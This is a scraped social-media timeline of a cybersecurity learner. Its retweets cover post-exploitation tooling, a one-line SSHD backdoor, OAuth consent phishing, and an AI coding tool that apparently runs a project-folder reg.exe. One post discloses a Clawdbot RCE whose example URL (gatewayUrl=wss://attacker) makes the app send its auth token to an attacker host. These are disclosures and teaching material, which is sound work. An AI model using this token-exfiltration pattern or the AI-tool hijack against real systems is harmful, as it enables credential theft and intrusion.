lee1981

1.6K posts

lee1981 banner
lee1981

lee1981

@lee1981b

Learning Cyber-Security, Bug bounty hunting, Ethical hacking & Malware Analysis 😀

uk Katılım Ekim 2013
2.8K Takip Edilen477 Takipçiler
lee1981 retweetledi
John Hammond
John Hammond@_JohnHammond·
GraphSpy: A Hacker's Tooling Deep Dive, video demos with the creator @RedByte1337! 🤩 Keanu shows me the wild things you can do for post-exploitation in Entra ID -- even adding a physical security key for persistence and a ton of other tricks 🤯 Video: youtu.be/qEtoKC32UoE
YouTube video
YouTube
John Hammond tweet media
English
6
68
397
0
lee1981 retweetledi
John Hammond
John Hammond@_JohnHammond·
funny nugget from the Payload Podcast with @JonnyJohnson_ today looks like claude code 2.1.69 on Windows shells out to do a registry query for settings (both HKCU and HKLM) so any reg.exe in your project folder would run right as claude starts up when will cc be a lolbin 😝
John Hammond tweet media
English
8
9
119
0
lee1981 retweetledi
@·
The recent Trezor-physical-mail-phish-delivery-crypto-scam made me giggle -- so I rambled about it in a video. I'm not a crypto guy but alarm bells should probably go off in your mind when something is asking for your recovery seed phrase. 😅 Video: youtu.be/UQFySFs2GJk
YouTube video
YouTube
 tweet media
English
7
6
53
0
lee1981 retweetledi
André Baptista
André Baptista@0xacb·
🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…
English
24
157
676
120.3K
lee1981
lee1981@lee1981b·
😀 Another Quality Year of Learning Complete Over on TryHackMe😎 Huge Thanks to @tryhackme For the Amazing Year 😀👍.
lee1981 tweet media
English
0
0
1
86
lee1981
lee1981@lee1981b·
Another Amazing Advent of Cyber Completed😃 massive thanks to @tryhackme for another brilliant year of challenges!😀😀😀.
lee1981 tweet media
English
0
0
2
56
lee1981
lee1981@lee1981b·
This is one very tasty offer to be had over on learn.justhacking.com "Use Code CYBER25 For 25% Off Courses! Ends Mid ET Dec 31"😀. I Used it on this beauty of a course "Windows Log Analysis - SIEMless Threat Hunting"😀one of many amazing courses available, The course looks
lee1981 tweet media
English
0
0
3
25
lee1981 retweetledi
@·
🚨 DAY 16 IS LIVE 🚨 Welcome to Registry Forensics. McSkidy is still missing. dispatch-srv01 didn’t just break...it was touched. And the Windows Registry? Yeah… it remembers everything. No guessing. No vibes. Just cold, forensic truth. 🕵️‍♀️ The clock’s ticking. The evidence is waiting. 👉 Start Day 16 now: tryhackme.com/adventofcyber2…
 tweet media tweet media tweet media
English
3
15
83
0
lee1981 retweetledi
The Hacker's Choice (@thc@infosec.exchange)
THC Release: 🎄Smallest SSHD backdoor🎄 - Does not add any new file - Survives apt-update - Does not use PAM or authorized_keys Just SSHD trickery....adds one line only. More at thc.org/tips 👌
The Hacker's Choice (@thc@infosec.exchange) tweet media
English
4
108
518
40.2K
lee1981 retweetledi
John Hammond
John Hammond@_JohnHammond·
"'ConsentFix', a browser-based ClickFix-style attack with OAuth consent grants" ... leveraging the Azure CLI app client to social engineer for easy access into Entra ID 👀 I got nerdsniped by this, so I played with it a bit and tried a drag-and-drop gesture! Video: youtu.be/AAiiIY-Soak
YouTube video
YouTube
John Hammond tweet media
English
7
74
377
0